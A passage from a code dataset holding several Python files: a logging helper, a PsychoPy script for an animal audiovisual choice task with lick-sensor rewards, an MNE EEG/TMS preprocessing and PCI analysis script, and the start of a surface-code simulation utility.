format\nconsole.setFormatter(formatter)\n\n# Add the handler to the root logger\nlogging.getLogger('').addHandler(console)\n\ndef debug(msg):\n if __debug__:\n logger.debug(\"(pid=\" + str(os.getpid()) + \") \" + msg)\n\ndef error(msg):\n logger.error(\"(pid=\" + str(os.getpid()) + \") \" + msg)\n\ndef info(msg):\n logger.info(\"(pid=\" + str(os.getpid()) + \") \" + msg)\n\ndef warning(msg):\n logger.warning(\"(pid=\" + str(os.getpid()) + \") \" + msg)\n","sub_path":"src/obf_logger.py","file_name":"obf_logger.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"77728966","text":"from psychopy import visual, core, data, event, logging, sound, gui\r\nfrom psychopy.constants import * # things like STARTED, FINISHED\r\nimport numpy as np # whole numpy lib is available, prepend 'np.'\r\nfrom numpy.random import random, randint, normal, shuffle\r\nimport os # handy system and path functions\r\nimport glob\r\nimport time\r\nfrom functions.movie_functions import load_movie, load_next_stimulus\r\nfrom modules.Serial_functions import open_serial, send_data_until_confirmation\r\nfrom modules.functions import calibrate_lick_sensor, lick_detection, led_on, led_off, give_reward\r\n\r\nn_trials = 500\r\nvalve_duration = 100 # in ms\r\ndistractor_contrast = 1\r\n\r\ntest_mode = True\r\nif not test_mode:\r\n serial_obj = open_serial(COM_port='COM3', baudrate=9600)\r\n # ADJUST_TOUCHLEVEL = 75\r\n # send_data_until_confirmation(serial_obj, header_byte=ADJUST_TOUCHLEVEL, data=[3])\r\n calibrate_lick_sensor(serial_obj)\r\n print('ready')\r\n\r\n give_reward(serial_obj, valve_duration=valve_duration)\r\n#\r\n\r\nsound_1 = sound.Sound(value='d', secs=0.5, octave=8, stereo=True, volume=1.0, loops=0, sampleRate=44100, hamming=True, name='', autoLog=True)\r\nsound_2 = sound.Sound(value='c', secs=0.2, octave=4, stereo=True, volume=1.0, loops=0, sampleRate=44100, hamming=True, name='', autoLog=True)\r\n\r\n# Ensure that relative paths start from the same directory as this script\r\n_thisDir = os.path.dirname(os.path.abspath(__file__))\r\nos.chdir(_thisDir)\r\n\r\n# Store info about the experiment session\r\nexpName = 'Audiovisual_dist 50p'\r\nexpInfo = {'participant': '', 'session': '001'}\r\ndlg = gui.DlgFromDict(dictionary=expInfo, title=expName)\r\nif not dlg.OK:\r\n core.quit() # user pressed cancel\r\n#\r\n\r\nexpInfo['date'] = data.getDateStr() # add a simple timestamp\r\n\r\nexpInfo['expName'] = expName\r\nimage_list = (0.38, 0.38, 0.38)\r\n#print image_list\r\ntrialnumber = 0\r\nbias = np.zeros((n_trials, 4))\r\n#print len(bias)\r\nlast_choice = ''\r\nleft = 0\r\nright = 0\r\nsame = 0\r\nopposite = 0\r\ncorrect_trials = np.zeros((n_trials, 1))\r\nreactiontime = np.zeros((n_trials, 1))\r\ncorrectstim = ''\r\norientation_difference=0\r\norientation=0\r\ncorrect_trial=0\r\nsave_reactiontime=0\r\nsave_correct=0\r\nsave_difference=0\r\nsave_orientation=0\r\ncorrect_orientation=0\r\norientation_range=1\r\norientation_diff_list=[90]\r\ntouch_delay=0\r\nlick_delay=0\r\ncorrect_output=0\r\n# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc\r\nfilename = _thisDir + os.sep + 'data' + os.sep + '%s_%s_%s' % \\\r\n (expInfo['participant'], os.path.splitext(expName)[0], expInfo['date'])\r\n\r\n# An ExperimentHandler isn't essential but helps with data saving\r\nthisExp = data.ExperimentHandler(name=os.path.splitext(expName)[0], version='', extraInfo=expInfo, runtimeInfo=None,\r\n originPath=None, savePickle=True, saveWideText=True, dataFileName=filename)\r\n#save a log file for detail verbose info\r\nlogFile = logging.LogFile(filename+'.log', level=logging.EXP)\r\nlogging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file\r\n\r\nendExpNow = False # flag for 'escape' or other condition => quit the exp\r\n\r\n# Start Code - component code to be run before the window creation\r\n\r\n# Setup the Window\r\n# size=(1920, 1080)\r\nwin = visual.Window(size=(600, 400), fullscr=True, screen=1, allowGUI=False, allowStencil=False,\r\n monitor='testMonitor', color=[-0.01, -0.01, -0.01], colorSpace='rgb',\r\n blendMode='avg', useFBO=True, multiSample=True, numSamples=16)\r\n\r\nwin.mouseVisibile = False\r\n# store frame rate of monitor if we can measure it successfully\r\nexpInfo['frameRate']=win.getActualFrameRate()\r\nif expInfo['frameRate'] is not None:\r\n frameDur = 1.0/round(expInfo['frameRate'])\r\nelse:\r\n frameDur = 1.0/60.0 # couldn't get a reliable measure so guess\r\n#\r\n\r\n# Initialize components for Routine \"trial\"\r\ntrialClock = core.Clock()\r\nISI = core.StaticPeriod(win=win, screenHz=expInfo['frameRate'], name='ISI')\r\n\r\nfile_name = [['phaseDiff_target_1.mp4', 'phaseDiff_distractor_1.mp4'],\r\n ['phaseDiff_target_2.mp4', 'phaseDiff_distractor_2.mp4'],\r\n ['phaseDiff_target_3.mp4', 'phaseDiff_distractor_3.mp4']]\r\n\r\ntarget_file_path, distractor_file_path = file_name[np.random.randint(len(file_name))]\r\n\r\ntarget_mov = load_movie(win, target_file_path, noAudio=False, opacity=1., pos=(200, 0))\r\ndistractor_mov = load_movie(win, distractor_file_path, noAudio=True, opacity=distractor_contrast, pos=(-200, 0))\r\n\r\n# target_mov.setAutoDraw(True)\r\n# distractor_mov.setAutoDraw(True)\r\n\r\ntarget_mov.stop()\r\ndistractor_mov.stop()\r\n\r\n# target_mov.play()\r\n# distractor_mov.play()\r\n\r\nmouse = event.Mouse(win=win, visible=False)\r\nx, y = [None, None]\r\ncross = visual.ShapeStim(win=win, name='cross', units='cm',\r\n vertices=((0, -0.5), (0, 0.5), (0,0), (-0.5,0), (0.5, 0)),\r\n lineWidth=3,\r\n closeShape=False,\r\n lineColor='white'\r\n)\r\n\r\n# Create some handy timers\r\nglobalClock = core.Clock() # to track the time since experiment started\r\nroutineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine \r\n\r\n# set up handler to look after randomisation of conditions etc\r\nprint('Generating trials ...')\r\ntrials = data.TrialHandler(nReps=n_trials, method='random',\r\n extraInfo=expInfo, originPath=None,\r\n trialList=[None],\r\n seed=None, name='trials')\r\nprint('Done generating trials!')\r\nthisExp.addLoop(trials) # add the loop to the experiment\r\nthisTrial = trials.trialList[0] # so we can initialise stimuli with some values\r\n# abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)\r\nif thisTrial != None:\r\n for paramName in thisTrial.keys():\r\n exec(paramName + '= thisTrial.' + paramName)\r\n\r\nfor thisTrial in trials:\r\n stop_session = False\r\n\r\n currentLoop = trials\r\n # abbreviate parameter names if possible (e.g. rgb = thisTrial.rgb)\r\n if thisTrial != None:\r\n for paramName in thisTrial.keys():\r\n exec(paramName + '= thisTrial.' + paramName)\r\n \r\n #------Prepare to start Routine \"trial\"-------\r\n t = 0\r\n trialClock.reset() # clock \r\n frameN = -1\r\n routineTimer.add(121.000000)\r\n # update component parameters for each repeat\r\n # setup some python lists for storing info about the mouse\r\n # keep track of which components have finished\r\n trialComponents = []\r\n trialComponents.append(ISI)\r\n trialComponents.append(cross)\r\n trialComponents.append(target_mov)\r\n trialComponents.append(distractor_mov)\r\n trialComponents.append(mouse)\r\n for thisComponent in trialComponents:\r\n if hasattr(thisComponent, 'status'):\r\n thisComponent.status = NOT_STARTED\r\n \r\n # chosen_image=np.random.randint(0, high=len(image_list))\r\n # target_mov.setSF(image_list[chosen_image])\r\n # distractor_mov.setSF(image_list[chosen_image])\r\n # #target_mov.setImage(image_list[chosen_image])\r\n # #distractor_mov.setImage(image_list[chosen_image])\r\n trialnumber=trialnumber+1\r\n # orientation_list=[90]\r\n # orientation_list=(orientation_list)\r\n mouse.setPos((0, 0))\r\n\r\n #\r\n \r\n # ## bias correction\r\n if trialnumber < 10:\r\n if np.random.uniform(0, high=100) <= 50:\r\n # load_next_stimulus(target_mov=target_mov, distractor_mov=distractor_mov,\r\n # target_path=file_name[1], distractor_path=file_name[0], target_side_left=False)\r\n #\r\n # # target_mov = load_movie(win, file_path, noAudio=True, opacity=1.)\r\n # # distractor_mov = load_movie(win, file_path_2, noAudio=True, opacity=1.)\r\n # target_mov.play()\r\n # distractor_mov.play()\r\n\r\n '''\r\n orientation=orientation_list[np.random.randint(0,high=len(orientation_list),size=1)]\r\n target_mov.setOri(orientation)\r\n orientation_difference=orientation_diff_list[np.random.randint(0,high=orientation_range,size=1)]\r\n correct_orientation=int(orientation+orientation_difference)\r\n distractor_mov.setOri(correct_orientation)\r\n correctstim='right'\r\n '''\r\n correctstim = 'right'\r\n #\r\n \r\n if np.random.uniform(0, high=100) > 50:\r\n '''\r\n orientation=orientation_list[np.random.randint(0,high=len(orientation_list),size=1)]\r\n distractor_mov.setOri(orientation)\r\n orientation_difference=orientation_diff_list[np.random.randint(0,high=orientation_range,size=1)]\r\n correct_orientation=int(orientation+orientation_difference)\r\n target_mov.setOri(correct_orientation)\r\n correctstim='left'\r\n '''\r\n\r\n # # target_mov = load_movie(win, file_path_2, noAudio=True, opacity=1.)\r\n # # distractor_mov = load_movie(win, file_path, noAudio=False, opacity=1.)\r\n # load_next_stimulus(target_mov=target_mov, distractor_mov=distractor_mov,\r\n # target_path=file_name[1], distractor_path=file_name[0],\r\n # target_side_left=correctstim == 'left')\r\n # target_mov.play()\r\n # distractor_mov.play()\r\n\r\n correctstim = 'left'\r\n #\r\n else:\r\n # Use Bias-correction\r\n bias_left = np.abs(left)\r\n bias_right = np.abs(right)\r\n bias_same = np.abs(same)\r\n bias_opposite = np.abs(opposite)\r\n if np.abs(bias_left-bias_right) == np.abs(bias_same-bias_opposite):\r\n if np.random.uniform(0, high=100) <= 50:\r\n # orientation=orientation_list[np.random.randint(0,high=len(orientation_list),size=1)]\r\n # target_mov.setOri(orientation)\r\n # orientation_difference=orientation_diff_list[np.random.randint(0,high=orientation_range,size=1)]\r\n # correct_orientation=int(orientation+orientation_difference)\r\n # distractor_mov.setOri(correct_orientation)\r\n correctstim = 'right'\r\n else:\r\n correctstim = 'left'\r\n #\r\n #\r\n\r\n if np.abs(bias_left-bias_right) > np.abs(bias_same-bias_opposite):\r\n if bias_left > bias_right:\r\n correctstim = 'right'\r\n else:\r\n correctstim = 'left'\r\n #\r\n #\r\n\r\n if np.abs(bias_left-bias_right) < np.abs(bias_same-bias_opposite):\r\n if bias_same < bias_opposite:\r\n if last_choice == 'left':\r\n correctstim = 'left'\r\n \r\n if last_choice == 'right':\r\n correctstim = 'right'\r\n #\r\n \r\n if bias_same > bias_opposite:\r\n if last_choice == 'left':\r\n correctstim = 'right'\r\n else:\r\n correctstim = 'left'\r\n #\r\n #\r\n #\r\n #\r\n\r\n #\r\n\r\n # ##################################################################################################################\r\n # Update Stimuli:\r\n\r\n target_file_path, distractor_file_path = file_name[np.random.randint(len(file_name))]\r\n load_next_stimulus(target_mov=target_mov, distractor_mov=distractor_mov,\r\n target_path=target_file_path, distractor_path=distractor_file_path,\r\n target_side_left=correctstim == 'left', distractor_opacity=distractor_contrast)\r\n target_mov.play()\r\n distractor_mov.play()\r\n # ##################################################################################################################\r\n\r\n # gerion = 0\r\n\r\n #-------Start Routine \"trial\"-------\r\n continueRoutine = True\r\n while continueRoutine and routineTimer.getTime() > 0:\r\n # get current time\r\n t = trialClock.getTime()\r\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\r\n # mouse.setPos((0, 0))\r\n\r\n # # # # # # # # #\r\n # INSERT - GERION\r\n # if t > 6 and gerion == 0:\r\n # if np.random.rand() > 0.5:\r\n # mouse.setPos((1, 0))\r\n # print('Simulated answer: LEFT')\r\n # else:\r\n # mouse.setPos((0, 1))\r\n # print('Simulated answer: RIGHT')\r\n # #\r\n # elif t > 20:\r\n # core.quit()\r\n #\r\n # # # # # # # # #\r\n\r\n x, y = mouse.getPos()\r\n # mouse_info = mouse.getPos()[0]\r\n mouse_info = x\r\n # print(mouse_info)\r\n\r\n # target_mov.setPhase(t*2)\r\n # distractor_mov.setPhase(t*2)\r\n if t > 120:\r\n print('timeout')\r\n core.quit()\r\n # print mouse_info\r\n # update/draw components on each frame\r\n if mouse_info > 0:\r\n bias[trialnumber-1, 0] = 1 # colloumnds in bias array: 0=left, 1=right, 2=same. 3=opposite\r\n bias[trialnumber-1, 1] = 0\r\n last_choice = 'left'\r\n if mouse_info < 0:\r\n bias[trialnumber-1, 0] = 0\r\n bias[trialnumber-1, 1] = 1\r\n last_choice='right'\r\n \r\n # *cross* updates\r\n if t >= 0.5 and cross.status == NOT_STARTED:\r\n # keep track of start time/frame for later\r\n cross.tStart = t # underestimates by a little under one framef\r\n cross.frameNStart = frameN # exact frame index\r\n cross.setAutoDraw(True)\r\n if cross.status == STARTED and t >= (0.5 + (0.5-win.monitorFramePeriod*0.75)): # most of one frame period left\r\n cross.setAutoDraw(False)\r\n # *ISI* period\r\n if t >= 0.0 and ISI.status == NOT_STARTED:\r\n # keep track of start time/frame for later\r\n ISI.tStart = t # underestimates by a little under one frame\r\n ISI.frameNStart = frameN # exact frame index\r\n ISI.start(0.5)\r\n elif ISI.status == STARTED: #one frame should pass before updating params and completing\r\n ISI.complete() #finish the static period\r\n # *target_mov* updates\r\n if t >= 1.2 and target_mov.status == NOT_STARTED:\r\n # keep track of start time/frame for later\r\n target_mov.tStart = t # underestimates by a little under one frame\r\n target_mov.frameNStart = frameN # exact frame index\r\n target_mov.setAutoDraw(True)\r\n distractor_mov.setAutoDraw(True)\r\n if target_mov.status == STARTED and mouse_info != 0: # most of one frame period left\r\n target_mov.setAutoDraw(False)\r\n distractor_mov.setAutoDraw(False)\r\n if mouse_info > 0:\r\n # last_choice == 'left'\r\n # reactiontime[trialnumber-1] = 0\r\n save_reactiontime = 0\r\n if correctstim == 'left' and trialnumber > 0:\r\n touch_delay = trialClock.getTime()\r\n correct_trials[trialnumber-1] = 1.\r\n correct_trial = 1.\r\n sound_2 = sound.Sound(value='c', secs=0.2, octave=4, stereo=True, volume=1., loops=0,\r\n sampleRate=44100, hamming=True, name='', autoLog=True)\r\n sound_2.play()\r\n # # distractor_mov.setAutoDraw(False)\r\n # target_mov.setAutoDraw(False)\r\n distractor_mov.stop()\r\n target_mov.stop()\r\n time.sleep(0.4)\r\n\r\n if not test_mode:\r\n led_on(serial_obj)\r\n stop_session = lick_detection(win, serial_obj, valve_duration=valve_duration)\r\n led_off(serial_obj)\r\n #\r\n lick_delay=trialClock.getTime()\r\n mouse.setPos((0,0))\r\n \r\n if correctstim=='right' and trialnumber>0:\r\n correct_trial=0.\r\n touch_delay=trialClock.getTime()\r\n win.color=[1,1,1]\r\n win.flip()\r\n # sound_1 = sound.Sound(value='d', secs=0.5, octave=8, stereo=True, volume=0.5, loops=0, sampleRate=44100, bits=16, hamming=True, start=0, stop=-1, name='', autoLog=True)\r\n sound_1 = sound.Sound(value='d', secs=0.5, octave=8, stereo=True, volume=1., loops=0,\r\n sampleRate=44100, hamming=True, name='', autoLog=True)\r\n sound_1.play()\r\n time.sleep(0.2)\r\n mouse.setPos((0,0))\r\n # target_mov.setAutoDraw(False)\r\n # # distractor_mov.setAutoDraw(False)\r\n target_mov.stop()\r\n distractor_mov.stop()\r\n\r\n if not test_mode:\r\n stop_session = lick_detection(win, serial_obj, rewarded=False, valve_duration=valve_duration)\r\n #\r\n win.color=[0,0,0]\r\n win.flip()\r\n\r\n lick_delay=trialClock.getTime()\r\n mouse.setPos((0,0))\r\n\r\n # *distractor_mov* updates\r\n # if t >= 1.2 and distractor_mov.status == NOT_STARTED:\r\n # # keep track of start time/frame for later\r\n # distractor_mov.tStart = t # underestimates by a little under one frame\r\n # distractor_mov.frameNStart = frameN # exact frame index\r\n # distractor_mov.setAutoDraw(True)\r\n if mouse_info != 0.: # most of one frame period left\r\n # distractor_mov.setAutoDraw(False)\r\n if mouse_info < 0:\r\n last_choice == 'right'\r\n reactiontime[trialnumber-1]=0\r\n save_reactiontime=0\r\n if correctstim=='right' and trialnumber>0:\r\n touch_delay=trialClock.getTime()\r\n correct_trials[trialnumber-1]=1.\r\n correct_trial=1\r\n sound_2 = sound.Sound(value='c', secs=0.2, octave=4, stereo=True, volume=1.0, loops=0,\r\n sampleRate=44100, hamming=True, name='', autoLog=True)\r\n sound_2.play()\r\n target_mov.stop()\r\n distractor_mov.stop()\r\n time.sleep(0.4)\r\n\r\n if not test_mode:\r\n led_on(serial_obj)\r\n stop_session = lick_detection(win, serial_obj, valve_duration=valve_duration)\r\n led_off(serial_obj)\r\n #\r\n # distractor_mov.setAutoDraw(False)\r\n # target_mov.setAutoDraw(False)\r\n\r\n lick_delay=trialClock.getTime()\r\n mouse.setPos((0,0))\r\n \r\n if correctstim=='left' and trialnumber>0:\r\n correct_trial=0.\r\n touch_delay=trialClock.getTime()\r\n win.color=[1,1,1]\r\n win.flip()\r\n # sound_1 = sound.Sound(value='d', secs=0.5, octave=8, stereo=True, volume=0.5, loops=0, bits=16,\r\n # sampleRate=44100, hamming=True, start=0, stop=-1, name='', autoLog=True)\r\n sound_1 = sound.Sound(value='d', secs=0.5, octave=8, stereo=True, volume=1., loops=0,\r\n sampleRate=44100, hamming=True, name='', autoLog=True)\r\n sound_1.play()\r\n time.sleep(0.2)\r\n # target_mov.setAutoDraw(False)\r\n # distractor_mov.setAutoDraw(False)\r\n target_mov.stop()\r\n distractor_mov.stop()\r\n win.flip()\r\n\r\n if not test_mode:\r\n stop_session = lick_detection(win, serial_obj, rewarded=False, valve_duration=valve_duration)\r\n #\r\n\r\n win.color=[0,0,0]\r\n win.flip()\r\n\r\n lick_delay=trialClock.getTime()\r\n mouse.setPos((0,0))\r\n \r\n save_orientation=int(orientation)\r\n save_correct=int(correct_trial)\r\n save_difference=int(np.abs(correct_orientation-orientation))\r\n save_reactiontime=float(save_reactiontime)\r\n \r\n # *mouse* updates\r\n if t >= 0.0 and mouse.status == NOT_STARTED:\r\n # keep track of start time/frame for later\r\n mouse.tStart = t # underestimates by a little under one frame\r\n mouse.frameNStart = frameN # exact frame index\r\n mouse.status = STARTED\r\n mouse.setPos((0,0))\r\n event.mouseButtons = [0, 0, 0] # reset mouse buttons to be 'up'\r\n if mouse.status == STARTED and mouse_info!=0: #most of one frame period left\r\n mouse.status = STOPPED\r\n #if mouse.status == STARTED: # only update if started and not stopped!\r\n # buttons = mouse.getPressed()\r\n # if sum(buttons) > 0: # ie if any button is pressed\r\n # abort routine on response\r\n # continueRoutine = False\r\n # *ISI* period\r\n if t >= 0.0 and ISI.status == NOT_STARTED:\r\n # keep track of start time/frame for later\r\n ISI.tStart = t # underestimates by a little under one frame\r\n ISI.frameNStart = frameN # exact frame index\r\n ISI.start(0.5)\r\n elif ISI.status == STARTED: #one frame should pass before updating params and completing\r\n ISI.complete() #finish the static period\r\n \r\n # check if all components have finished\r\n if not continueRoutine: # a component has requested a forced-end of Routine\r\n break\r\n continueRoutine = False # will revert to True if at least one component still running\r\n for thisComponent in trialComponents:\r\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\r\n continueRoutine = True\r\n break # at least one component has not yet finished\r\n \r\n \r\n # check for quit (the Esc key)\r\n if stop_session or endExpNow or event.getKeys(keyList=[\"escape\"]):\r\n stop_session = True\r\n break\r\n #\r\n\r\n # refresh the screen\r\n if continueRoutine: # don't flip if this routine is over or we'll get a blank screen\r\n win.flip()\r\n if bias[trialnumber-1,0]+bias[trialnumber-2,0]==2:\r\n bias[trialnumber-1,2]=1\r\n if bias[trialnumber-1,0]+bias[trialnumber-2,0]==1:\r\n bias[trialnumber-1,3]=1\r\n if bias[trialnumber-1,1]+bias[trialnumber-2,1]==2:\r\n bias[trialnumber-1,2]=1\r\n if bias[trialnumber-1,1]+bias[trialnumber-2,1]==1:\r\n bias[trialnumber-1,3]=1\r\n \r\n if trialnumber>10:\r\n left=np.sum(bias[trialnumber-11:trialnumber-1,0])\r\n right=np.sum(bias[trialnumber-11:trialnumber-1,1])\r\n same=np.sum(bias[trialnumber-11:trialnumber-1,2])\r\n opposite=np.sum(bias[trialnumber-11:trialnumber-1,3])\r\n \r\n correct_output=correct_output+correct_trial\r\n print(correct_output/trialnumber)\r\n \r\n #-------Ending Routine \"trial\"-------\r\n for thisComponent in trialComponents:\r\n if hasattr(thisComponent, \"setAutoDraw\"):\r\n thisComponent.setAutoDraw(False)\r\n # store data for trials (TrialHandler)\r\n # trials.addData('imagename', image_list[chosen_image])\r\n\r\n trials.addData('mouse.x', x)\r\n trials.addData('mouse.y', y)\r\n trials.addData('target_movie', target_file_path)\r\n trials.addData('distractor_movie', distractor_file_path)\r\n trials.addData('distractor_contrast', distractor_contrast)\r\n trials.addData('correct',save_correct)\r\n trials.addData('Difference',save_difference)\r\n trials.addData('touch_delay', touch_delay)\r\n trials.addData('lick_delay', lick_delay)\r\n trials.addData('orientation', save_orientation)\r\n trials.addData('correctstim', correctstim)\r\n trials.addData('last_choice', last_choice)\r\n #trials.addData('bias', bias)\r\n thisExp.nextEntry()\r\n\r\n try:\r\n if stop_session:\r\n break\r\n #\r\n except:\r\n pass\r\n #\r\n#\r\n\r\nwin.close()\r\nthisExp.saveAsWideText(filename+'.csv')\r\nthisExp.saveAsPickle(filename)\r\nlogging.flush()\r\n# make sure everything is closed down\r\nthisExp.abort() # or data files will save again on exit\r\n# while True:\r\n# time.sleep(1.)\r\n# #\r\n# while True:\r\n# if event.getKeys(keyList=[\"escape\"]):\r\n# break\r\n# #\r\n# #\r\n\r\n# time.sleep(20.)\r\ndlg = gui.DlgFromDict(dictionary={'press OK': 'press OK'}, title='Quit?')\r\ncore.quit()\r\n","sub_path":"Phase 5.py","file_name":"Phase 5.py","file_ext":"py","file_size_in_byte":24640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"451614276","text":"import mne\nimport scipy\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom pathlib import Path\nfrom scipy.integrate import simps\nimport os\nos.chdir(\"//lagringshotell/imb-jstormlab/Data/Anesthesia_Project/EEG_Analysis\")\nfrom pci_st import *\n\n\n# define path and filename (here you might want to loop over datasets!)\nfilename = \"ane_SD_EMG_1016_sed_tms_2.vhdr\"\nfilepath = Path(\"//lagringshotell/imb-jstormlab/Data/Anesthesia_Project/EEG/ane_SD_1016\")\n#filepath = Path(\"E:/Anesthesia/EEG/ane_SD_1016\")\nfile = filepath / filename\n\n \ndef plot_response(signal, argument):\n \"\"\"plot response to check what happened with the data\"\"\"\n if \"time\" in argument:\n signal.plot(duration=10, remove_dc=False)\n if \"psd\" in argument:\n signal.plot_psd(fmin=0, fmax=80)\n if \"butter\" in argument:\n signal.plot(butterfly=True, color='#00000044', bad_color='r')\n if \"ica\" in argument:\n signal.plot_components()\n\n\ndef detect_bad_ch(eeg):\n \"\"\"plots each channel so user can decide whether good (mouse click) or bad (enter / space)\"\"\"\n good_ch, bad_ch = [], []\n intvl = eeg.__len__() // 20\n if type(eeg) is mne.epochs.EpochsArray:\n # Benny's way is way too slow.... and a bit ugly... \n # Let's try it MNE style\n n_chan = eeg.ch_names.__len__()\n n_disp = 8\n for i in range(0,n_chan,n_disp):\n # Choose 4 channels at a time\n cur_picks = eeg.ch_names[i:(i + n_disp)]\n fig = eeg.plot(picks=cur_picks, title='Click channel names to reject, click on epochs to reject epoch; Use mouse to move around figure, press any key to advance')\n\n # Wait until keyboard is pressed\n while not plt.waitforbuttonpress(): \n print('Inspecting channels..')\n\n plt.close(fig)\n return eeg\n else:\n for ch in eeg.ch_names:\n \"\"\"loop over each channel and plot to decide if bad\"\"\"\n time_data = eeg[eeg.ch_names.index(ch)][0][0]\n df = pd.DataFrame()\n for i in range(20):\n df_window = pd.DataFrame(time_data[i * intvl:(i + 1) * intvl])\n df_window += (i + 1) * 0.0001\n df = pd.concat((df, df_window), axis=1)\n\n df *= 1000 # just for plotting\n fig = plt.figure(figsize=(14, 8))\n fig.suptitle(f\"{ch}: mouse click for keep (good), any other key for remove (bad)\")\n ax1 = plt.subplot2grid((3, 3), (0, 0), colspan=1)\n ax2 = plt.subplot2grid((3, 3), (0, 1), colspan=2, rowspan=3)\n ax1.psd(time_data, 5000, 5000)\n ax1.set_xlim([0, 55])\n ax2.plot(df, 'b')\n plt.show()\n\n if not plt.waitforbuttonpress():\n good_ch.append(ch)\n plt.close(fig)\n else:\n bad_ch.append(ch)\n plt.close(fig)\n\n return good_ch, bad_ch\n\ndef detect_bad_ic(ica_data, data_orig):\n \"\"\"plots each independent component so user can decide whether good (mouse click) or bad (enter / space)\"\"\"\n good_ic, bad_ic = [], []\n bad_list = []\n \"!!Change back to full range!!\"\n for c in range((ica_data.get_components().shape[1])): \n \"\"\"loop over each channel and plot to decide if bad\"\"\"\n ica_data.plot_properties(inst=data_orig, picks=c)\n\n if not plt.waitforbuttonpress():\n good_ic.append(c)\n plt.close()\n else:\n bad_ic.append(c)\n plt.close()\n\n #[bad_list.append(ica_data.ch_names.index(ci)) for ci in bad_ic]\n return bad_ic\n\n\n \n# Make feature that asks for parameters by inspecting the data\ndef TMS_interpolate(data,tmin=-2.5,tmax=5, pulse_start = -0.002, pulse_end = 0.007): # interpolates TMS pulses\n events = mne.events_from_annotations(data) #Generate an event file for pulses and annotations:\n\n #Epoch data using function (setting index 0 for events selects a list in the array obj. events):\n \"Baseline correct??\"\n baseline = (None, 0.0)\n data = mne.Epochs(data, events[0], tmin=tmin, tmax=tmax, preload=True)\n #epochs.plot()\n mne.preprocessing.fix_stim_artifact(data, events=events[0], event_id='Response/R128', tmin=pulse_start, tmax=pulse_end)\n\n return data\n\n# 1. load data (vhdr file)\ndata = mne.io.read_raw_brainvision(file)\ndata.load_data()\n# plot_response(data, 'time')\n\n# 2 channel info (remove EMG and set type for EOG channels)\n#data.drop_channels('EMG')\ndata.set_channel_types({'VEOG': 'eog', 'HEOG': 'eog'})\ndata.set_montage('standard_1005')\n\n# 3. Replace TMS pulse artefact with noise based on baseline statistics\ndata = TMS_interpolate(data) # look at function to change\n# data.apply_baseline(None,0.0) ; Done in function now\n\n\n# 4. filter (first high- then low-pass; notch-filter?)\nl_cut, h_cut = 0.5, 45\ndata.filter(l_freq=l_cut, h_freq=h_cut)\n# plot_response(data, 'psd')\n\n# 5. resample (with low-pass filter!)\nnew_sampling = 1000\ndata.resample(new_sampling, npad='auto')\n#plot_response(data, ['time', 'psd'])\n\n# 6. Crop epochs.\ndata = data.crop(tmin=-0.2, tmax=0.5)\n\n#!!!!!!!!!!!TEMPORARY FIX!!!!!!!!!\ndata = mne.EpochsArray(data._data, info=data.info, tmin=-0.2)\n\n# 7. remove bad channels (or do not remove but track them)\n#good, bad = detect_bad_ch(data)\ndata = detect_bad_ch(data)\nbad = data.info['bads'] # keep track of bad channels but do not remove (MNE style)\n#data.drop_channels(bad) # remove bad channels (eeglab style)\ndata = data.interpolate_bads(reset_bads=True) # for presentation of bad channels change to False\n\n\n# 8. PCA + ICA (by default if rank violated)\nn_ic = len(data.ch_names)-len(bad)\nica = mne.preprocessing.ICA(method='infomax', fit_params=dict(extended=True), max_pca_components=n_ic)\nica.fit(data, picks=['eeg', 'eog'])\n\nica.plot_components(inst=data) # show all components interactive (slow)\n# Wait until any key is pressed in the last opened window!!!!\n# !!!! DO NOT CLOSE WINDOWS MANUALLY!!!\nwhile not plt.waitforbuttonpress(): \n print('Inspecting channels..')\nplt.close('all')\n\n# 9. loop through each channel (faster):\n# ica.exclude = detect_bad_ic(ica, data)\nclean_data = data.copy()\nica.apply(clean_data, exclude=ica.exclude)\n\n# 4. filter (first high- then low-pass; notch-filter?)\n# h_cut = 45\n# data.filter()\n# plot_response(data, 'psd')\n\n# 10. Run ICA again to remove any remaining artifacts?\n\n# 11. re-reference to average\nclean_data.set_eeg_reference('average', projection=False) # you might want to go with True\n\n# 12. create evoked data (average over all trials)/ Butterfly plot\n\nevoked_epochs = clean_data.average()\nevoked_epochs.plot_joint() # plots butterfly plot\n\n# remove line-noise by notch filter (not always recommended!)\n#data.notch_filter(freqs=np.arange(50, h_cut, 50))\n\n# 13. Calculate PCI_ST\n# Use same baseline window as above, define response window from evoked response!\npar = {'baseline_window':(-0.2,-0.002), 'response_window':(0.007,50), 'k':1.2, 'min_snr':1.1, 'max_var':99, 'embed':False,'n_steps':100}\npci = calc_PCIst(evoked_epochs.data, evoked_epochs.times, **par)\nprint(pci)\n","sub_path":"Old/EEG_TMS_ANALYSIS (v.2).py","file_name":"EEG_TMS_ANALYSIS (v.2).py","file_ext":"py","file_size_in_byte":7103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"459093936","text":"'''\n2020 Mark Shui Hu, QuTech\n\nwww.github.com/watermarkhu/oop_surface_code\n_____________________________________________\n\n'''\nfrom .. import oopsc\nfrom oopsc.superoperator import superoperator as so\nfrom pprint import pprint\nimport multiprocessing as mp\nimport pandas as pd\nimport sys, os\nSUP_INDICES = ['node', 'pg', 'pn', 'pm', 'pm_1', 'p_bell_success', 'pulse_duration', 'GHZ_success', 'protocol_name']\n\n\ndef get_superoperator_indices(lattices, superoperators):\n index_dict = {\"L\": lattices}\n for att in SUP_INDICES:\n index_dict.update({att: list(set([getattr(s, att) for s in superoperators]))})\n\n return index_dict\n\n\ndef get_current_index(lattice, superoperator):\n index = (lattice,)\n for att in SUP_INDICES:\n value = getattr(superoperator, att) if getattr(superoperator, att) is not None else \"None\"\n index += (value,)\n\n return index\n\n\ndef read_data(file_path):\n try:\n data = pd.read_csv(file_path, header=0, float_precision='round_trip')\n indices = [\"L\", \"p\"] if \"GHZ_success\" not in data else [\"L\", \"pg\", \"GHZ_success\"]\n return data.set_index(indices)\n except FileNotFoundError:\n 